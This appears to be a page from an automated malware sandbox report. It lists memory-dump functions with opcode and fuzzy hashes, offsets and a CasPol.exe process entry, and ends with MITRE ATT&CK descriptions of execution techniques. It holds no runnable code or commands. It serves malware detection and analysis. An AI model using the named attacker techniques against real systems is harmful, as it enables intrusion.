Instruction ID: 88f02160c04185f42f98e40f99f3147924dd9ac2706832e2231c467fb88abdd5
Opcode Fuzzy Hash: a3f9f3838b79d800281b1ef1090c6b4a0884c7db8301f3afda2347f462b24ac4
Instruction Fuzzy Hash: 851102B5D042498FDB10CF9AD448BDEFBF8FB88224F14852AD929A7600D375A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0574B2F8, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0574B35D

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8546d51e4a24dc60dd571ea6c55ecbb7b3bdbb2c59b6b8df49e71fb92c60cc3a
Instruction ID: 57e319620bd4bfc774957b965e6cd0518cda712224ebb171a8de14efd0db22a3
Opcode Fuzzy Hash: 8546d51e4a24dc60dd571ea6c55ecbb7b3bdbb2c59b6b8df49e71fb92c60cc3a
Instruction Fuzzy Hash: 1611BF71804399CEEB10CF95D445BEEBFF4EB09324F148469E559A3281CB789A44DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0574B2F6, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0574B35D

Memory Dump Source

Source File: 0000001C.00000002.547899369.0000000005740000.00000040.00000001.sdmp, Offset: 05740000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 0a7ae0898ac711237696e168336b30af7a094c1c7e2960db9098cb24adfe4fac
Instruction ID: 92572f5b22814d2616808ee03861f9fb37bbdb96403681b4f5eaf356bc031fe5
Opcode Fuzzy Hash: 0a7ae0898ac711237696e168336b30af7a094c1c7e2960db9098cb24adfe4fac
Instruction Fuzzy Hash: 1711EF75804389CEEB00CF95C0457EEBFF0EB08324F04842AE158A3281CB789A04DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015CD3DC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.515923079.00000000015CD000.00000040.00000001.sdmp, Offset: 015CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c291e5a2e5dc519893570689218a570167471e2bfe6851453e6433dea81d05d2
Instruction ID: 9ade2d73e93597f2dc85838a121b8c61387b26c380a972233e2d4ed82201b2f6
Opcode Fuzzy Hash: c291e5a2e5dc519893570689218a570167471e2bfe6851453e6433dea81d05d2
Instruction Fuzzy Hash: B721D171504244DFDB01DF94D9C0B6AFBB6FB84624F24C57DEA058E206C376E856C6E2

Uniqueness

Uniqueness Score: -1.00%

Function 015DD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.516628807.00000000015DD000.00000040.00000001.sdmp, Offset: 015DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e88d91aff772170d908012d8f854fafbaf260ba0384cd493e82c798be0916d
Instruction ID: 07dc8980166b7b4f9f8bf96398310fff665962de633fb119bb4404aa268d17a2
Opcode Fuzzy Hash: 26e88d91aff772170d908012d8f854fafbaf260ba0384cd493e82c798be0916d
Instruction Fuzzy Hash: 82212571608244DFCB21DF58D9C4B26BBB5FBC4364F24C969D9094F286D336D846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 015DD005, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.516628807.00000000015DD000.00000040.00000001.sdmp, Offset: 015DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400f757db02235f05a33fa5090f3dcb05660614d0afd9e30c5e92a16706c48b5
Instruction ID: a866cbc69a9e47680eb6567270ef0d7f473bfee68ec655458b26cb7ada60849b
Opcode Fuzzy Hash: 400f757db02235f05a33fa5090f3dcb05660614d0afd9e30c5e92a16706c48b5
Instruction Fuzzy Hash: A82183754083809FCB12CF68D994B15BF71FB86214F28C5EAD8458F297D33AD856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 015CD3D7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.515923079.00000000015CD000.00000040.00000001.sdmp, Offset: 015CD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d838226bc16e0845f65d18a922d88f0f92716b460af501a39e48939d31f0a21
Instruction ID: 217e11f22d20eb54f5d71551aeb5934a19925c7cd1fbe8544b3fb161356b9ec0
Opcode Fuzzy Hash: 5d838226bc16e0845f65d18a922d88f0f92716b460af501a39e48939d31f0a21
Instruction Fuzzy Hash: E7119D76404280DFCB02CF54D9C4B5AFF72FB84624F24C6A9D9084A616C37AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: CasPol.exe PID: 2900 Parent PID: 5308 CasPol.exeCOMMON

Executed Functions

Function 060D2798, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5443a699c518b84633e98ddc7bf7dafe239993094340cd3d2a6cad65593834
Instruction ID: 0e18a1dc83153d9b7d416bc3de6b41d23499b9ee63889d166e200835a01c0edd
Opcode Fuzzy Hash: 6e5443a699c518b84633e98ddc7bf7dafe239993094340cd3d2a6cad65593834
Instruction Fuzzy Hash: B3314D30A46B40DFE7B9CB3AC55036AFBE1BF84205F14C96EC69B86A60DB75A541CB40

Uniqueness

Uniqueness Score: -1.00%

Function 060D0390, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d6955e965945c2ab570ee7fdafc1d52d6ba3d1f776bf2052aa4bf24dacf165
Instruction ID: 5f03d1cd0c43bd9a5d858ca8b5ecedbfbd34f29487a9d2d691a84267a851c319
Opcode Fuzzy Hash: e3d6955e965945c2ab570ee7fdafc1d52d6ba3d1f776bf2052aa4bf24dacf165
Instruction Fuzzy Hash: 9C21E731B002148FC704DF69D884A6DBBF5EF8A324B1582BAE519CB362CB70EC06C790

Uniqueness

Uniqueness Score: -1.00%

Function 060D1608, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5532c72ae524a4aab8514091172802c5e4852f87bcd0c39f12d1eb747dd1c05
Instruction ID: 0cce5ff74783cd459552e95087732d826f1dde3d82b3f58edab2c9d8da58c8af
Opcode Fuzzy Hash: f5532c72ae524a4aab8514091172802c5e4852f87bcd0c39f12d1eb747dd1c05
Instruction Fuzzy Hash: 35219A30F442089FD784AB75E41D26E7FE2EF85201F088669E406E7780DF389942CF96

Uniqueness

Uniqueness Score: -1.00%

Function 060D2261, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ffde57763d560e580b63699307341234cf43a8bd7d0da74c66b3d7573c16f1
Instruction ID: 830a1cfbcceaff42458d98d38068944f417a04e3e10b8c0a4178546219b51725
Opcode Fuzzy Hash: 93ffde57763d560e580b63699307341234cf43a8bd7d0da74c66b3d7573c16f1
Instruction Fuzzy Hash: AE31B130B003049FDB50DF75C541AAEBBF6EF89604B54892DE502EB741DB35E982CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 060D2575, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da9200181f433d5a7bcebdfd10318d3660c4c716079471276d97a22f81a6af7
Instruction ID: a79a373c61bb714d08787b3ec5276e20c295c2a2160fa5cc9b21cdd6894e1de7
Opcode Fuzzy Hash: 0da9200181f433d5a7bcebdfd10318d3660c4c716079471276d97a22f81a6af7
Instruction Fuzzy Hash: 66311270E003489FCB54DFA9D984ADEBFF1AF48314F148129E919AB250DB349A45CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 060D2270, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d07572ed49aa3cf7b48b3283c7890ca1df68ef29c97fb005097e8ae192c723f
Instruction ID: 5c524dfd7f8555ee7cb16ac7fa10f61cfd69bffc14a2f1a2c2c3c56bc1862558
Opcode Fuzzy Hash: 0d07572ed49aa3cf7b48b3283c7890ca1df68ef29c97fb005097e8ae192c723f
Instruction Fuzzy Hash: 4731A030B003049FDB55DF74C545AAEBBF2AF89304B14493DE502AB750DB35E982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 060D2580, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22feaf9024448d7b39f6987e15c52be06b2d7f9ce5a9ec9a11d366d11ac0799d
Instruction ID: 2496d40605d94a9e3437fc2ef2488bad9e6ecad9ab4303302538480ad8e6a2d4
Opcode Fuzzy Hash: 22feaf9024448d7b39f6987e15c52be06b2d7f9ce5a9ec9a11d366d11ac0799d
Instruction Fuzzy Hash: 27312270E003489FCB54CFAAD984ADEBFF5AF48314F148129E919AB250DB349E45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 060D1F78, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887af19616a0bcd686543782c47d93e7b9664f85f904b21698e0ccfc860f6dad
Instruction ID: 3fa53b8d2b68be4d3019246496277129b64d3132939a2dfac7456c04dd0170d4
Opcode Fuzzy Hash: 887af19616a0bcd686543782c47d93e7b9664f85f904b21698e0ccfc860f6dad
Instruction Fuzzy Hash: 9F21CE31A44318CBDB95DB64C4102FDBFE2EF88351F00467AE606AB741CB759985CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 060D1618, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92fba174a575b8f6648ec82e6e081c15d5c2c4092626fd1179bb56148df76887
Instruction ID: 7c688c5239c0d1cf4cb1a04ed16cf705d0e35496957e9d2c58559787a5caaffc
Opcode Fuzzy Hash: 92fba174a575b8f6648ec82e6e081c15d5c2c4092626fd1179bb56148df76887
Instruction Fuzzy Hash: 56217C34F542089FD794AB75E01D26E7FF2AF85201F088669E016E3780DF389942CF96

Uniqueness

Uniqueness Score: -1.00%

Function 060D28B8, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 385996bb19806a739a754ea4e1f0e4196715942b6a73cd0d49696664470c9e73
Instruction ID: 181d3967bf40ae4089734f9ccde5a749371d5b5ea0fec062c4bfd4e80495d19b
Opcode Fuzzy Hash: 385996bb19806a739a754ea4e1f0e4196715942b6a73cd0d49696664470c9e73
Instruction Fuzzy Hash: 2B314675D10309DFDB54CFA4D484AADFBB1FF88314F24866AE505AB301D731AA86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 060D14D0, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79215a667eecd8f6b3e394e6ead9af7b666884f9daf04010f16f36c19215a510
Instruction ID: 88c6114ace0aa39a2c7b16de33efcbb6e86fc3e3b407d2e2eca798d88d4ed416
Opcode Fuzzy Hash: 79215a667eecd8f6b3e394e6ead9af7b666884f9daf04010f16f36c19215a510
Instruction Fuzzy Hash: 202149796007158FC766EF34E25651ABBF2EB842153008A2DE15ADB718DF35AD0ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 060D09E0, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9578f1b8cbc519c21cc10569f77b2e0c3e139edeefb2d48be5bd399cb89907f8
Instruction ID: e3c2597a4f8a6439386e82e8bc12d168a2a9da5d3ef17b890fcde078aa523a9d
Opcode Fuzzy Hash: 9578f1b8cbc519c21cc10569f77b2e0c3e139edeefb2d48be5bd399cb89907f8
Instruction Fuzzy Hash: 5A1182307487058BD7689B68E05416EBBA6DFC1218B48CA2DE10FCB244DB73E843C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 060D0C38, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc83e66f25ba7ba6e78f79c6446fdc23f4b2da45377831745cb383bb2d82e008
Instruction ID: 05b8aa5f9ed76e338200c2d0a6878aea8b1b00f70f29015c21ed12b7f1fda774
Opcode Fuzzy Hash: dc83e66f25ba7ba6e78f79c6446fdc23f4b2da45377831745cb383bb2d82e008
Instruction Fuzzy Hash: F2119D30740A01AFD7A4CB55D8C0D6AFBAAEBC8224F14CA19D55F87B50CB31BC42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 060D0478, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef851d08022fc208440b735b007a1b0597a22bcc89a29ea09262acd45a201966
Instruction ID: 8e03aee8ff4647bed10c86923a69ba2c2b3a9d244cd97674370885623232fcb2
Opcode Fuzzy Hash: ef851d08022fc208440b735b007a1b0597a22bcc89a29ea09262acd45a201966
Instruction Fuzzy Hash: A211C171B003849FD312AB28E15961A3FE2EB81210F0985D9D04E8B355CB34AD09CB94

Uniqueness

Uniqueness Score: -1.00%

Function 060D1DE0, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8f13b7bca45e5bb967431a205e89ac0cac4a5f14d53c6ce2cef9463837c89c
Instruction ID: 5b2fd0beb9d6468fcca8874bca3e4727a3f2fc9ccabff72878efac74165bb07a
Opcode Fuzzy Hash: 9b8f13b7bca45e5bb967431a205e89ac0cac4a5f14d53c6ce2cef9463837c89c
Instruction Fuzzy Hash: FC01F9327001006FD7142B78E9095AF7AEADBCD611700857EF50BE7705ED759C024BD4

Uniqueness

Uniqueness Score: -1.00%

Function 060D0468, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd58b283ff2183b285207b8d18ee4a1831440de2a1c731f012ab7498423f9dde
Instruction ID: 1dae532a43854c97fe903bef9fde73b3d6280964394c31aabf2b98812823cc17
Opcode Fuzzy Hash: cd58b283ff2183b285207b8d18ee4a1831440de2a1c731f012ab7498423f9dde
Instruction Fuzzy Hash: 8811D2B2A053949FE3429B24E2596193FF2AB46200F0945DAD48E8B356C7349D49CB94

Uniqueness

Uniqueness Score: -1.00%

Function 060D1DF0, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a8b574195921a4f5ce23bde236b4f485f4ae9ab2c13bc664d16b7caa642b61
Instruction ID: 4eff0d4fdb3da072ef19f8ceddafcd2f3d06ab5ad63ce9d34c12b7a72edaa6a7
Opcode Fuzzy Hash: 10a8b574195921a4f5ce23bde236b4f485f4ae9ab2c13bc664d16b7caa642b61
Instruction Fuzzy Hash: 4CF0F632710200AF87143BB9A9098AF7AEEDB8D661300453EF50BD3704ED759C024BE0

Uniqueness

Uniqueness Score: -1.00%

Function 060D2520, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f551d6e97bbb9576ccd70b099f019dc4b9db2bdbab8f178184537618fde7c6ab
Instruction ID: 8c9380dcd44bd61f70ba4b81e8eb886adb2acda3309bf6e860da34091afd10d6
Opcode Fuzzy Hash: f551d6e97bbb9576ccd70b099f019dc4b9db2bdbab8f178184537618fde7c6ab
Instruction Fuzzy Hash: 27E05533B883204BEBA0606C7868FBDAEC8DBC1271F040276DB4EC714E8431498583E0

Uniqueness

Uniqueness Score: -1.00%

Function 060D2491, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b34d401c6e2da7675515f90562e2c6d7ae7dd3db124e1796cd67d91fd0d2fa3d
Instruction ID: 9d66ddf7b32299f84441962c8aef291959b11126af2a0420984bd374df612f51
Opcode Fuzzy Hash: b34d401c6e2da7675515f90562e2c6d7ae7dd3db124e1796cd67d91fd0d2fa3d
Instruction Fuzzy Hash: 69E022327406041FC724E218E46162FB7F5CBC1638B54C92EDA2FCBB01DE22DA0203C0

Uniqueness

Uniqueness Score: -1.00%

Function 060D0C28, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a460c2676aa300c11ccf6f7146e9c01d6777d761eb59eba3d5034038cf2c0c90
Instruction ID: 8c90b0b7bb12f5f2481fddc07859c0275db1430db6b6666f7ad4cddb619ff52d
Opcode Fuzzy Hash: a460c2676aa300c11ccf6f7146e9c01d6777d761eb59eba3d5034038cf2c0c90
Instruction Fuzzy Hash: A5E09B357009015BD2248606D881F56F7D6DBC5234F14C629D81F87B01C621EC03C5D1

Uniqueness

Uniqueness Score: -1.00%

Function 060D0BDE, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4ddd86440d354c41764808a3062550b560098ba4331391565dc6669c4f3ed3
Instruction ID: 82514a3fc5742b4fb2d61d56212f351293495c7c649b1c3630952c9192ed2f4f
Opcode Fuzzy Hash: 8d4ddd86440d354c41764808a3062550b560098ba4331391565dc6669c4f3ed3
Instruction Fuzzy Hash: 02E022313092108FE3506B24E42071C3BA4DB46214F151996D40BCB252C9519C0183EA

Uniqueness

Uniqueness Score: -1.00%

Function 060D2511, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2e4a774580f062706e41ed8187bd34b22264f8842f58d8c3b0fdc19cfebed0
Instruction ID: 6e7f7ea4ffd497309c1031f709ecddbf1098830ba9f1e70db4379bc53f73a77f
Opcode Fuzzy Hash: cf2e4a774580f062706e41ed8187bd34b22264f8842f58d8c3b0fdc19cfebed0
Instruction Fuzzy Hash: F4E0203798A3405BE7E5401DBC65F6DBF84D781252F554376D64AD114FC8304545C3E5

Uniqueness

Uniqueness Score: -1.00%

Function 060D24A0, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c034555359a332d8f022235d67fe3fcd417dd21143cd9ab066303929c64c532c
Instruction ID: 7d3b7834d9f43d6aad3e7b9790e9bdefc04efc31af445b9a30837e141a3ede55
Opcode Fuzzy Hash: c034555359a332d8f022235d67fe3fcd417dd21143cd9ab066303929c64c532c
Instruction Fuzzy Hash: AEE026317443045F4764E258E46082FBBAACBC4A38344892EDA0ECB700DF72EE0247D0

Uniqueness

Uniqueness Score: -1.00%

Function 060D2C60, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93daf2a9701a981507021e4f3e84bfb0df75ec8e6c2440f9ec750b9065e63e91
Instruction ID: aae7da8c264893b49a0b44f7ef5761a58543d4d15690d77cef36fd6486498376
Opcode Fuzzy Hash: 93daf2a9701a981507021e4f3e84bfb0df75ec8e6c2440f9ec750b9065e63e91
Instruction Fuzzy Hash: 40E086727006144FD224DA68E85279E73E5DB82214748CA1ED517DBB01DB71F90787D5

Uniqueness

Uniqueness Score: -1.00%

Function 060D2CA1, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c14d770353180f54a765deff9913fc866a102fab72183607d518e399107411
Instruction ID: 66d36e7c5fdc844ca6f82717ea07609aeea36642b17b0da09d5a22b8ffd48b2d
Opcode Fuzzy Hash: 11c14d770353180f54a765deff9913fc866a102fab72183607d518e399107411
Instruction Fuzzy Hash: EED02B3E6406080BD44036FCE4073DE3BD5CFC2445F488321A51ADBF01CE60D4038281

Uniqueness

Uniqueness Score: -1.00%

Function 060D24E0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56fe9487121370037863be4ac69e1e90619599f6cef3b9435c961210702a9729
Instruction ID: 6c0df54f329f39d5405097f78760ee01befe3b93972508384f706895f17c2d7a
Opcode Fuzzy Hash: 56fe9487121370037863be4ac69e1e90619599f6cef3b9435c961210702a9729
Instruction Fuzzy Hash: EFD02B36049304CFD7008620EA5572D7BB0D745326B208A95D90FCA209C232EB8386D1

Uniqueness

Uniqueness Score: -1.00%

Function 060D0BF8, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61abb2ebb61c8cca4baba56df705c071dab899c1a11147d04ab664e98e58bc5a
Instruction ID: 2ae0b95058e38ad9cc8e29e07b4c141883bf39588d2052de36b762efba40649c
Opcode Fuzzy Hash: 61abb2ebb61c8cca4baba56df705c071dab899c1a11147d04ab664e98e58bc5a
Instruction Fuzzy Hash: 04D05B31354110DF57447B68B46446C3699DB89614B102D96D50F8B710DD925C4153E5

Uniqueness

Uniqueness Score: -1.00%

Function 060D24F0, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42612fba3c733c3b2ef6abfc0d5e550a7a2af8afebc9689e62c2e168cccadaa9
Instruction ID: 2993a3efbf1973cd0fb7a5ec031d457fcafa6a46057f9664fd43b683ffcd7a8b
Opcode Fuzzy Hash: 42612fba3c733c3b2ef6abfc0d5e550a7a2af8afebc9689e62c2e168cccadaa9
Instruction Fuzzy Hash: 1DD0C934188308CF97445A609A5482C7B64AB893153204A99E60B4A21DD633EA838AC0

Uniqueness

Uniqueness Score: -1.00%

Function 060D09B1, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37b7eb31c0fc459dc12d02690566c274ccb7622e896768e8a157740568015107
Instruction ID: 4deb544661a464a2df2fb7d7a3f0678f7094183f3bbb066f40ecd10688c8e272
Opcode Fuzzy Hash: 37b7eb31c0fc459dc12d02690566c274ccb7622e896768e8a157740568015107
Instruction Fuzzy Hash: 55C04C3541250887DA155720D9477087772E742202F9446A495575A752EE299622C645

Uniqueness

Uniqueness Score: -1.00%

Function 060D29DC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96bdbd07955ffb4d76142f15403f37ee29b962272f35b150d830b9ccb9ab3b70
Instruction ID: 400d2637c6ec0c86572bb61a84180125bbeb3dd716b5d5910d54ea7ff7a7c3cf
Opcode Fuzzy Hash: 96bdbd07955ffb4d76142f15403f37ee29b962272f35b150d830b9ccb9ab3b70
Instruction Fuzzy Hash: BDC04C36A451098EEF005B95F4453ECFB60F78032AF100166D71E524459675169556D1

Uniqueness

Uniqueness Score: -1.00%

Function 060D2CB0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3d07714808c0524d4742836899389044dc5b64a6a6d414186cdcc8c2def569
Instruction ID: e5f2c02ac4c3b3664a793391a2c273fdfd7918cf637c7e39bcbdf794c3995e08
Opcode Fuzzy Hash: 0e3d07714808c0524d4742836899389044dc5b64a6a6d414186cdcc8c2def569
Instruction Fuzzy Hash: DAB0123098030C47498033F4241D05C7A9E4F410057C00360B41E837019F6A9402045D

Uniqueness

Uniqueness Score: -1.00%

Function 060D14E0, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.540483972.00000000060D0000.00000040.00000001.sdmp, Offset: 060D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fcd3f604a640a73da6df5d3e7213e6385eb9c05119718df844d66bc4d3b7e4
Instruction ID: 3e10464a2e9c303025c096edd66cd6076231f0f088f224c256c99b11b22fe585
Opcode Fuzzy Hash: c1fcd3f604a640a73da6df5d3e7213e6385eb9c05119718df844d66bc4d3b7e4
Instruction Fuzzy Hash: A4B0927004D308DF93A1AB52EA59C6E7B3DEE411153414A51E2028116CAF686E8645E6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

